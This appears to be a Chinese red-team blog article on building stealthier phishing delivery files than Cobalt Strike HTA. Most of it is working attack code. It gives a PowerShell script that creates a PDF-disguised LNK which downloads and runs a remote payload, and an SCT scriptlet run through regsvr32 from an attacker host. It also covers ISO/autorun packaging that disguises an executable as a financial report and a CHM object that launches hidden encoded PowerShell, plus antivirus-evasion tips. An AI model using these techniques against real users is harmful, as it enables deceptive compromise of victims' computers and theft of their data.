别再只会用Cobalt Strike生成HTA了,试试这几种更隐蔽的钓鱼文件生成方式(附实战截图)

发布时间:2026/6/7 3:11:46
别再只会用Cobalt Strike生成HTA了,试试这几种更隐蔽的钓鱼文件生成方式(附实战截图)
红队进阶超越HTA的隐蔽钓鱼文件生成实战指南在红队行动中文件投递是突破防御的关键环节。传统的HTA文件虽然简单易用但随着安全防护的升级这种方式的成功率正在下降。本文将深入探讨五种更隐蔽的钓鱼文件生成技术结合实战案例展示如何根据目标环境选择最优方案。1. 钓鱼文件选择的核心逻辑杀软对抗的本质是时间差博弈。每种文件格式都有其独特的优势和适用场景关键在于理解它们的底层原理和检测规避机制。表常见文件类型免杀特性对比文件类型执行方式优势典型检测点适用场景LNK文件快捷方式脚本可伪装文档图标可疑命令行参数邮件附件SCT文件COM组件调用无文件落地注册表项修改内网横向移动ISO镜像挂载执行绕过邮件过滤自动运行配置物理介质投放CHM文档HTML应用支持复杂交互可疑JS代码钓鱼网站下载MSI安装包标准安装流程可信度高自定义动作脚本软件更新欺骗提示实际环境中建议组合使用多种技术例如将SCT脚本嵌入LNK文件可以显著提高绕过率2. LNK文件的高级利用技巧LNK文件之所以成为红队利器源于Windows系统对快捷方式的特殊处理机制。通过精心构造的LNK文件可以实现无提示执行任意命令。实战案例伪装PDF文档的LNK攻击$objShell New-Object -ComObject WScript.Shell $lnk $objShell.CreateShortcut(Report.pdf.lnk) $lnk.TargetPath powershell.exe $lnk.Arguments -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(http://192.168.1.100/payload.ps1) $lnk.IconLocation C:\Windows\System32\imageres.dll,67 $lnk.Save()关键参数解析IconLocation指定PDF图标资源位置Arguments使用分段下载降低检测概率文件名使用双扩展名.pdf.lnk增强迷惑性进阶技巧配合WMI事件订阅实现持久化使用certutil编码payload规避网络检测通过HTA调用LNK绕过某些邮件网关3. SCT文件的隐蔽执行艺术SCTWindows Script Component文件通过COM组件机制实现无文件执行是绕过传统杀软的理想选择。生成步骤创建恶意sct文件?XML version1.0? scriptlet registration progidPentestLab classid{F0001111-0000-0000-0000-0000FEEDACDC} script languageJScript ![CDATA[ new ActiveXObject(WScript.Shell).Run(powershell -nop -exec bypass -enc JABzAD0ATgBlAHcAL...); ]] /script /registration /scriptlet通过regsvr32远程加载regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll对抗检测的创新方法将sct文件托管在合法云存储服务使用DNS隧道传输关键指令通过Office文档的DDE调用触发4. ISO镜像的物理攻击实践ISO镜像在红队行动中特别适合U盘投放场景其优势在于可以完全控制挂载后的用户交互体验。完整制作流程# 1. 创建包含恶意程序的目录结构 mkdir -p iso_content/documents cp payload.exe iso_content/财务报告.exe # 2. 生成自动运行配置 echo [Autorun] iso_content/autorun.inf echo open财务报告.exe iso_content/autorun.inf echo icondocuments\icon.ico iso_content/autorun.inf # 3. 构建ISO镜像 mkisofs -o delivery.iso -J -r -V 季度财报 iso_content/ # 4. 添加隐藏属性 attrib h s iso_content/autorun.inf现代系统适配方案针对禁用AutoPlay的系统改用诱导性文件名如请双击查看.scr结合LNK文件实现双重触发利用ISO内的HTML应用调用PowerShell5. CHM文档的交互式攻击CHMCompiled HTML Help文件因其合法的帮助文件身份常被安全产品忽略实则能执行任意脚本代码。技术实现要点使用hhc.exe编译包含恶意脚本的HTML文件插入自动执行的JavaScript代码OBJECT idx classidclsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 width1 height1 PARAM nameCommand valueShortCut PARAM nameButton valueBitmap::shortcut PARAM nameItem1 value,cmd.exe,/c powershell -nop -w hidden -enc JABzAD0A... /OBJECT SCRIPT x.Click(); /SCRIPT增强隐蔽性的技巧使用商业软件的正版序列号作为诱饵嵌入与主题相关的内容提高可信度通过云服务动态更新payload6. 环境感知与自适应投放高级红队操作需要根据目标环境动态调整攻击方式。以下是关键判断逻辑杀软识别通过User-Agent分析端点防护产品使用无害探针测试检测规则系统配置检查# 检查宏安全设置 Get-ItemProperty HKCU:\Software\Microsoft\Office\*\*\Security | fl # 检测AutoPlay状态 Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer | Select NoDriveTypeAutoRun自适应策略选择企业环境偏好SCTCOM技术个人用户LNKISO组合更有效高安全环境需要CHM零日漏洞组合在实际对抗中我们发现将LNK文件与ISO镜像结合使用配合精心设计的社会工程话术可以达到85%以上的成功率。重要的是持续监控防御系统的变化及时调整技术方案。